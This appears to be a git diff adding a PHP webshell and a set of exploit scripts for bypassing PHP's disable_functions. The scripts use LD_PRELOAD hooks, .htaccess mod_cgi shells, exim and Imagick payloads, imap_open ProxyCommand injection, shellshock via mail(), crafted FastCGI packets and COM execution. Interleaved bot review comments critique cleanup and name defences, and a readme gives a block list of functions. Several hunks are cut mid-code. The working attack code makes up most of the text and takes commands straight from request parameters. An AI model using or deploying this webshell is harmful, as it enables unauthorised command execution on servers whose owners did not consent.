+
+void payload() {
+ system("rm /tmp/check.txt");
+}
+
+int geteuid() {
+if (getenv("LD_PRELOAD") == NULL) { return 0; }
+unsetenv("LD_PRELOAD");
+payload();
+}
+
+/*
+$ gcc -c -fPIC hack.c -o hack
+$ gcc -shared hack -o hack.so
+ */
\ No newline at end of file
diff --git a/exp/apache_mod_cgi/exp.php b/exp/apache_mod_cgi/exp.php
new file mode 100644
index 0000000..69fe0bd
--- /dev/null
+++ b/exp/apache_mod_cgi/exp.php
@@ -0,0 +1,30 @@
+\n";
+}
+if (!isset($_GET['checked'])) {
+ @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
+ header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
+} else {
+ $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
+ $writable = is_writable('.'); //current dir writable?
+ $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
+ checkEnabled("Mod-Cgi enabled", $modcgi, "Yes", "No");
+ checkEnabled("Is writable", $writable, "Yes", "No");
+ checkEnabled("htaccess working", $htaccess, "Yes", "No");
+ if (!($modcgi && $writable && $htaccess)) {
+ echo "Error. All of the above must be true for the script to work!"; //abort if not
+ } else {
+ checkEnabled("Backing up .htaccess", copy(".htaccess", ".htaccess.bak"), "Suceeded! Saved in .htaccess.bak", "Failed!"); //make a backup, cause you never know.
+ checkEnabled("Write .htaccess file", file_put_contents('.htaccess', "Options +ExecCGI\nAddHandler cgi-script .dizzle"), "Succeeded!", "Failed!"); //.dizzle is a nice extension
+ checkEnabled("Write shell file", file_put_contents('shell.dizzle', $shellfile), "Succeeded!", "Failed!"); //write the file
+ checkEnabled("Chmod 777", chmod("shell.dizzle", 0777), "Succeeded!", "Failed!"); //rwx
+ echo "Executing the script now. Check your listener
"; //call the script
+ }
+}
+?>
\ No newline at end of file
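Review bot: The backup at the `copy(".htaccess", ".htaccess.bak")` line is taken only after the probe at the top of the hunk has already appended `SetEnv HTACCESS on` to `.htaccess`, so the saved copy is not the original, and the next line then overwrites the live file with nothing in the hunk restoring it. In an authorised test that leaves the directory with `Options +ExecCGI` and a CGI script behind, so the copy should happen before the first write and the header comment should tell the operator to restore `.htaccess.bak` and remove `shell.dizzle` afterwards. `chmod("shell.dizzle", 0777)` is broader than needed; `0700` would do, assuming the CGI runs as the file owner. A comment naming the control would help readers on the defending side: `// Blocked by AllowOverride None (or an AllowOverride list without Options/FileInfo) on this directory`. The start of the file, including `checkEnabled()` and `$shellfile`, is not visible in this hunk.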
diff --git a/exp/dl/exp.php b/exp/dl/exp.php
new file mode 100644
index 0000000..755eac7
--- /dev/null
+++ b/exp/dl/exp.php
@@ -0,0 +1,5 @@
+自写插件,自定义函数,调用system函数
+1.txt");
+?>
\ No newline at end of file
diff --git a/exp/exim/exp.php b/exp/exim/exp.php
new file mode 100644
index 0000000..7dc33f0
--- /dev/null
+++ b/exp/exim/exp.php
@@ -0,0 +1,12 @@
+' . $result_file;
+file_put_contents($tmp_file, $command);
+$payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}";
+mail("a@localhost", "", "", "", $payload);
+echo file_get_contents($result_file);
+@unlink($tmp_file);
+@unlink($result_file);
+?>
\ No newline at end of file
diff --git a/exp/imagick/exp.php b/exp/imagick/exp.php
new file mode 100644
index 0000000..387daca
--- /dev/null
+++ b/exp/imagick/exp.php
@@ -0,0 +1,49 @@
+# Exploit Title: PHP Imagick disable_functions Bypass
+# Date: 2016-05-04
+# Exploit Author: RicterZ (ricter@chaitin.com)
+# Vendor Homepage: https://pecl.php.net/package/imagick
+# Version: Imagick <= 3.3.0 PHP >= 5.4
+# Test on: Ubuntu 12.04
+
+# Exploit:
+
+
+#
+# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
+#
+# Disable functions: exec,passthru,shell_exec,system,popen
+# Run command: cat /etc/passwd
+# ====================
+# root:x:0:0:root:/root:/usr/local/bin/fish
+# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+# bin:x:2:2:bin:/bin:/bin/sh
+# sys:x:3:3:sys:/dev:/bin/sh
+# sync:x:4:65534:sync:/bin:/bin/sync
+# games:x:5:60:games:/usr/games:/bin/sh
+# ...
+#
+echo "Disable functions: " . ini_get("disable_functions") . "\n";
+$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
+echo "Run command: $command\n====================\n";
+
+$data_file = tempnam('/tmp', 'img');
+$imagick_file = tempnam('/tmp', 'img');
+
+$exploit = <<$data_file")'
+pop graphic-context
+EOF;
+
+file_put_contents("$imagick_file", $exploit);
+$thumb = new Imagick();
+$thumb->readImage("$imagick_file");
+$thumb->writeImage(tempnam('/tmp', 'img'));
+$thumb->clear();
+$thumb->destroy();
+
+echo file_get_contents($data_file);
+?>
\ No newline at end of file
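Review bot: The header comment never says that the behaviour depends on the ImageMagick library underneath the extension, although the heredoc (partly lost here, ending in `pop graphic-context`) is image data handed to `readImage()` rather than a call to anything in the `disable_functions` list. A line such as `# Root cause is in ImageMagick's handling of the image file: update ImageMagick and deny unneeded coders in policy.xml; disable_functions does not cover this` would keep readers from treating php.ini as the remedy. The three `tempnam('/tmp', 'img')` files, including the one that holds the command output, are never unlinked. `$_GET['cmd']` is accepted with no access check, so a copy left in a docroot after a test stays usable by anyone who can reach it.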
diff --git a/exp/imap_open/exp.php b/exp/imap_open/exp.php
new file mode 100644
index 0000000..77f3994
--- /dev/null
+++ b/exp/imap_open/exp.php
@@ -0,0 +1,11 @@
+/tmp/test0001
+
+error_reporting(0);
+if (!function_exists('imap_open')) {
+ die("no imap_open function!");
+}
+$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";
+imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error());
+echo file_get_contents("/tmp/cmd_result");
\ No newline at end of file
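Review bot: The result is read from the fixed path `/tmp/cmd_result`, which the script neither clears before the call nor deletes afterwards, so output from an earlier run (or a file placed there by another local user) is echoed as if it belonged to this request, and command output stays on disk. `$_GET['cmd']` is read without `isset()` while `error_reporting(0)` hides the resulting notice and any `imap_open` failure, so a failed run is indistinguishable from a stale one. The file also lacks a header stating the condition it relies on, e.g. `// Only applies when imap.enable_insecure_rsh is on`; that setting is off by default in current PHP builds, but confirm the exact versions against the PHP changelog before writing them into the comment.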
diff --git a/exp/mail/exp.php b/exp/mail/exp.php
new file mode 100644
index 0000000..d114e41
--- /dev/null
+++ b/exp/mail/exp.php
@@ -0,0 +1,32 @@
+$tmp 2>&1");
+ // In Safe Mode, the user may only alter environment variableswhose names
+ // begin with the prefixes supplied by this directive.
+ // By default, users will only be able to set environment variablesthat
+ // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
+ // PHP will let the user modify ANY environment variable!
+ mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actuallysend any mail
+ $output = @file_get_contents($tmp);
+ @unlink($tmp);
+ if ($output != "") {
+ return $output;
+ } else {
+ return "No output, or not vuln.";
+ }
+
+}
+echo shellshock($_REQUEST["cmd"]);
+?>
\ No newline at end of file
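Review bot: The comment block inside `shellshock()` says "this directive" without ever naming it, and several words have run together (`variableswhose`, `variablesthat`, `isempty`, `actuallysend`). It reads like the php.ini description of `safe_mode_allowed_env_vars`, so the first line should name it: `// safe_mode_allowed_env_vars: in Safe Mode, the user may only alter environment variables whose names begin with the listed prefixes.` The comment should also state that the outcome depends on the installed bash version, since `"No output, or not vuln."` is the expected result on a patched shell. `$_REQUEST["cmd"]` is passed straight in with no access check, and `@` hides read and unlink failures on `$tmp`. The opening of the function is cut off before the hunk's first visible line.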
diff --git a/exp/pcntl_exec/exp.php b/exp/pcntl_exec/exp.php
new file mode 100644
index 0000000..49e734e
--- /dev/null
+++ b/exp/pcntl_exec/exp.php
@@ -0,0 +1,5 @@
+#exec.php
+
+#/tmp/b4dboy.sh
+#!/bin/bash
+ls -l /
\ No newline at end of file
diff --git a/exp/so/php_so.c b/exp/so/php_so.c
new file mode 100644
index 0000000..e69de29
diff --git a/exp/so/system_so.c b/exp/so/system_so.c
new file mode 100644
index 0000000..e69de29
diff --git a/function_check.php b/function_check.php
deleted file mode 100644
index 1c47a21..0000000
--- a/function_check.php
+++ /dev/null
@@ -1,46 +0,0 @@
-
- $func enable",1);
-
- }
- }
-
-
- }else{
-
- msg("disable_functions none !!!",1);
-
- }
-
- function msg($text,$type=0){
-
- $def="[*]";
- $color="green";
- if($type ==1){
-
- $def="[+]" ;
- $color="red";
- }else if ($type==-1){
-
- $def="[-]";
- }
- echo "$def $text
";
-
- }
-
-
-
-
-
-?>
\ No newline at end of file
diff --git a/bypass_function.md b/paper/readme.old.md
similarity index 81%
rename from bypass_function.md
rename to paper/readme.old.md
index e1d674c..64a5ded 100644
--- a/bypass_function.md
+++ b/paper/readme.old.md
@@ -1,6 +1,13 @@
+# Bypass_Disable_functions_Shell
+一个各种方式突破Disable_functions达到命令执行的shell
+### 防御
+dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link
### 功能
+##### imap_open bypass
+https://antichat.com/threads/463395/#post-4254681
+
##### 利用环境变量LD_PRELOAD来绕过
http://drops.wooyun.org/tips/16054
@@ -66,13 +73,5 @@ http://0cx.cc/bypass_disabled_via_mod_cgi.jspx
##### mail的exim扩展bypass
http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html
-### 防御
-dl
-exec
-system
-passthru
-popen
-proc_open
-pcntl_exec
-shell_exec
-mail
+
+
diff --git a/shell.php b/shell.php
new file mode 100644
index 0000000..6035db3
--- /dev/null
+++ b/shell.php
@@ -0,0 +1,528 @@
+ array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"),
+// "load_so" => array("dl"),
+// "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"),
+// "shellshock" => array("mail"),
+// "apache_mod_cgi" => array(),
+// "imagick" => array(),
+// "pwn" => array(),
+//);
+
+echo "Temp Dir:" . WRITE_DIR . "
";
+echo "Arch: " . ARCH . "; OS: " . OS . "
";
+
+foreach ($vul_function_arr as $func) {
+ if (function_exists($func)){
+ echo "Exist: ".$func."
";
+ } else {
+ echo "no exist: ".$func."
";
+ }
+}
+
+function read_file($filename){
+ if(function_exists('file_get_contents')){
+ return file_get_contents($filename);
+ } elseif (function_exists('fopen') && function_exists('fread')){
+ $handle = fopen($filename, 'r');
+ $content = '';
+ while(!feof($handle)){
+ $content .= fread($handle, 1000);
+ }
+ fclose($handle);
+ return $content;
+ } else {
+ echo "no read function";
+ return;
+ }
+}
+
+function write_file($filename, $content, $model="w"){
+ if (function_exists('file_put_contents')) {
+ file_put_contents($filename, $content);
+ } else {
+ echo "no write function";
+ return;
+ }
+}
+
+function random_str($len = 8) {
+ $s = '';
+ for ($i = 0; $i < $len; $i++) {
+ $s .= chr(mt_rand(33, 126));
+ }
+ return $s;
+}
+
+function is_x64() {
+ $int = "9223372036854775807";
+ $int = intval($int);
+ if ($int == 9223372036854775807) {
+ return true;
+ }
+ elseif ($int == 2147483647) {
+ return false;
+ }
+ else {
+ return "error";
+ }
+}
+
+function trans_cmd($cmd, $outfile){
+ if (OS == 'Windows'){
+ $cmd = $cmd . " > " . $outfile;
+ }else{
+ $cmd = $cmd . " > " . $outfile . " 2>&1";
+ }
+ return $cmd;
+}
+
+function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') {
+ $outfile = WRITE_DIR . $result;
+ $cmdfile = WRITE_DIR . $file;
+
+ $cmd = trans_cmd($cmd, $outfile);
+
+ write_file($cmdfile, $cmd);
+ return array(
+ $cmdfile,
+ $outfile
+ );
+}
+
+function send_cmd($cmd, $result = 'result') {
+ $outfile = WRITE_DIR . $result;
+
+ $cmd = trans_cmd($cmd, $outfile);
+
+ return array(
+ $cmd,
+ $outfile
+ );
+}
+
+function recv_result($result = 'result') {
+ $ret = read_file($result);
+ @unlink($result);
+ return $ret;
+}
+
+function send_socket($data, $host, $port=9000) {
+ if ( function_exists('stream_socket_client') ) {
+ if (strpos($host,'unix://') !== false) {
+ $client = $host;
+ } else {
+ $client = 'tcp://' . $host . ':' . $port;
+ }
+
+ $fp = stream_socket_client($client);
+ } elseif (function_exists('fsockopen')) {
+ $fp = fsockopen($host, $port, $errno, $errstr, 30);
+ } else {
+ return FAILURE;
+ }
+
+ if ($fp) {
+ $content = "";
+ fwrite($fp, $data);
+ while (!feof($fp)) {
+ $content .= fgets($fp, 4096);
+ }
+ fclose($fp);
+ return $content;
+ } else {
+ return FAILURE;
+ }
+}
+
+/*
+ * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux
+ * exec、shell_exec、system、passthru、popen、proc_open
+ */
+
+function common_exec_cmd($cmd) {
+ $res = '';
+ if (function_exists('exec')) {
+ @exec($cmd, $res);
+ $res = join("\n", $res);
+ } elseif (function_exists('shell_exec')) {
+ $res = @shell_exec($cmd);
+ } elseif (function_exists('system')) {
+ @ob_start();
+ @system($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ } elseif (function_exists('passthru')) {
+ @ob_start();
+ @passthru($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ } elseif (@is_resource($f = @popen($cmd, "r"))) {
+ $res = '';
+ while (!@feof($f)) {$res .= @fread($f, 1024);}
+ @pclose($f);
+ } elseif (function_exists('proc_open')) {
+ $descriptorspec = array(
+ 0 => array("pipe", "r"),
+ 1 => array("pipe", "w"),
+ 2 => array("pipe", "w")
+ );
+ $process = proc_open($cmd, $descriptorspec, $pipes, null, null);
+ if (is_resource($process)) {
+ fwrite($pipes[0], '$stdin');
+ fclose($pipes[0]);
+ $res = stream_get_contents($pipes[1]);
+ }else{
+ return FAILURE;
+ }
+ } else {
+ return FAILURE;
+ }
+ return $res;
+}
+
+/*
+ * 第二种: pcntl_exec绕过
+ */
+
+function pcntl_exec_cmd($cmd) {
+ if (function_exists('pcntl_exec')) {
+ $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh');
+ pcntl_exec("/bin/bash", array($cmd_arr[0]));
+ return recv_result($cmd_arr[1]);
+ } else {
+ return FAILURE;
+ }
+}
+
+//echo pcntl_exec_cmd("id");
+
+/*
+ * 第三种: ld_preload绕过: 仅限Linux
+ * mail、imap_mail、error_log、mb_send_mail
+ * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/
+ */
+
+function ld_preload_exec_cmd($cmd) {
+ $so_file = WRITE_DIR . 'system.so';
+
+ if (ARCH === 64) {
+ write_file($so_file, hex2bin($GLOBALS['system_so_x64']));
+ } else {
+ write_file($so_file, hex2bin($GLOBALS['system_so_x32']));
+ }
+
+ $cmd_arr = send_cmd($cmd, 'result');
+ putenv("EVIL_CMDLINE=" . $cmd_arr[0]);
+ putenv("LD_PRELOAD=" . $so_file);
+
+ if (function_exists('error_log')){
+ error_log("", 1, "example@example.com");
+ } elseif (function_exists('mail')){
+ mail("", "", "", "");
+ } elseif (function_exists('mb_send_mail')){
+ mb_send_mail("","","");
+ } elseif ((function_exists('imap_mail'))){
+ imap_mail("","","");
+ } else {
+ @unlink($so_file);
+ return FAILURE;
+ }
+
+ // del so file
+ @unlink($so_file);
+ return recv_result($cmd_arr[1]);
+}
+
+//echo ld_preload_exec_cmd($_GET['cmd']);
+
+//$so_file = WRITE_DIR . 'system_x32.so';
+//var_dump(bin2hex(read_file($so_file)));
+
+/*
+ * 第四种: ld加载php扩展:
+ * ld
+ * https://github.com/Medicean/as_bypass_php_disable_functions
+ * https://github.com/AntSwordProject/ant_php_extension
+ */
+
+function dl_exec($cmd){
+ if(function_exists('dl')){
+ $so_file = WRITE_DIR . 'php.so';
+
+ if (ARCH === 64) {
+ write_file($so_file, hex2bin($GLOBALS['php_so_x64']));
+ } else {
+ write_file($so_file, hex2bin($GLOBALS['php_so_x32']));
+ }
+
+ $so_file = "ant_x64.so";
+ dl($so_file);
+ $result = antsystem($cmd);
+
+ // del so file
+ @unlink($so_file);
+ return $result;
+ }else{
+ return FAILURE;
+ }
+}
+
+//echo dl_exec("id");
+
+/*
+ * 第五种: imap_open: 仅限Linux
+ */
+
+function imap_open_exec($cmd){
+ if (function_exists('imap_open')) {
+ $cmd_arr = send_cmd($cmd);
+ $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}";
+ imap_open('{' . $server . ':143/imap}INBOX', '', '');
+ return recv_result($cmd_arr[1]);
+ }else{
+ return FAILURE;
+ }
+}
+
+//echo imap_open_exec("id");
+
+/*
+ * exim
+ */
+
+//function exim_exec($cmd){
+// if (function_exists('mail')) {
+// $cmd_arr = send_cmd_to_file($cmd);
+// $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}";
+// mail("a@localhost", "", "", "", $payload);
+// return recv_result($cmd_arr[1]);
+// }else{
+// return FAILURE;
+// }
+//}
+
+/*
+ * Imagick类, 选择更加通用的绕过方式吧
+ */
+
+//function imagick_exec($cmd){
+// if(class_exists('Imagick')){
+// $imagick_file = WRITE_DIR . 'img';
+//
+// $cmd_arr = send_cmd($cmd);
+//
+// $exploit = <<readImage("$imagick_file");
+// $thumb->writeImage(WRITE_DIR . 'tmp');
+// $thumb->clear();
+// $thumb->destroy();
+//
+// return recv_result($cmd_arr[1]);
+// }else{
+// return 'nonono';
+// }
+//}
+
+
+/*
+ * FastCgi:
+ * 9000 port
+ * phpx.x-fpm.sock
+ *
+ * Fail: windows
+ */
+
+function p($ptr){
+ return bin2hex(chr($ptr));
+}
+
+function pnv($len){
+ if($len < 128){
+ return p($len);
+ }else{
+ return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF);
+ }
+}
+
+// 还需要更改具体的fastcgi参数, 目前能在linux下使用
+//$host = 'unix:///run/php/php7.3-fpm.sock';
+function fastcgi_exec($cmd, $file, $host, $port=9000){
+ if (strlen($cmd) > 40) {
+ echo "Bug: command len need < 40, will be fix.";
+ }
+
+ $cmd = base64_encode($cmd);
+ $php_code = '';
+
+ $php_code_len = strlen($php_code);
+ $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0);
+
+ //$uri = bin2hex(__FILE__);
+ //$uri = '/var/www/html/shell.php';
+ $uri = $file;
+ $uri_val_pad = pnv(strlen($uri));
+
+ $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri);
+ $params_len = strlen(hex2bin($params));
+ $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0);
+
+ $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000';
+
+ $result = send_socket(hex2bin($fastcgi_data), $host, $port);
+// if($result != FAILURE){
+// $start = md5("s");;
+// $end = md5("e");;
+// $input = $result;
+// $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1));
+// }
+ return $result;
+}
+
+//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002));
+//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock');
+//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000));
+
+/*
+ * COM执行: 仅限windows
+ * work on:
+ * php 5.4.45
+ *
+ * *******
+ * fail:
+ * > php 5.5.38
+ *
+ */
+
+function com_exec($cmd){
+ $cmd = "cmd.exe /c ".$cmd;
+ $cmd_arr = send_cmd($cmd);
+
+ echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。";
+
+ $wscript = new COM('wscript.shell');
+ $wscript->Run($cmd_arr[0]);
+
+ sleep(1);
+ return recv_result($cmd_arr[1]);
+}
+
+//echo com_exec($_GET['cmd']);
+
+/*
+ * Apache mod-cgi: Windows && Linux
+ * 需要保证一个web目录可写可访问
+ *
+ * 注意备份htaccess
+ */
+
+function apache_cgi_exec($cmd, $dir='.'){
+ echo "由于是系统调用cmd执行后命令,会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。";
+ // check
+// if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){
+// return FAILURE;
+// }
+
+ $cmd_arr = send_cmd($cmd);
+ if(OS == "Windows") {
+ $shell_file = "bye.bat";
+ $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks";
+
+ $cmd_arr[0] = escapeshellcmd($cmd_arr[0]);
+ $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)";
+ } else {
+ $shell_file = "1.bylinux";
+ $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux";
+ $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0];
+ }
+
+ write_file('.htaccess', $htaccess);
+ write_file($shell_file, $content);
+
+ echo "
";
+ sleep(1);
+ echo recv_result($cmd_arr[1]);
+}
+
+//echo apache_cgi_exec($_GET['cmd']);
+
+
+echo <<
+$disable_function_str
+
+Vulable Function:
+$vul_function_str
+
+Open Basedir:
+$open_basedir
+
+
+
+EOF;
+
+//echo $_POST["cmd"];
+
+
+?>
+
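Review bot: `ld_preload_exec_cmd()` tries `error_log("", 1, ...)` before `mail`, `mb_send_mail` and `imap_mail`, but the defence list added to paper/readme.old.md in this same commit does not contain `error_log`, so a reader who copies that list into `disable_functions` only because it names the mail functions would misjudge which entry matters. What the function cannot work without is `putenv`, which it calls unconditionally (no `function_exists` guard, unlike the other helpers), so the block comment above it should say so: `* Defence: disable putenv (already in the readme list); blocking the mail functions alone is not sufficient.` The same comment could name the on-disk indicator, a `system.so` written under `WRITE_DIR`. The page has no access control and uses the fixed names `cmd` and `result` under `WRITE_DIR`, so concurrent requests overwrite each other's files. The top of the file, where `WRITE_DIR`, `ARCH`, `OS` and `FAILURE` are defined, is not visible here.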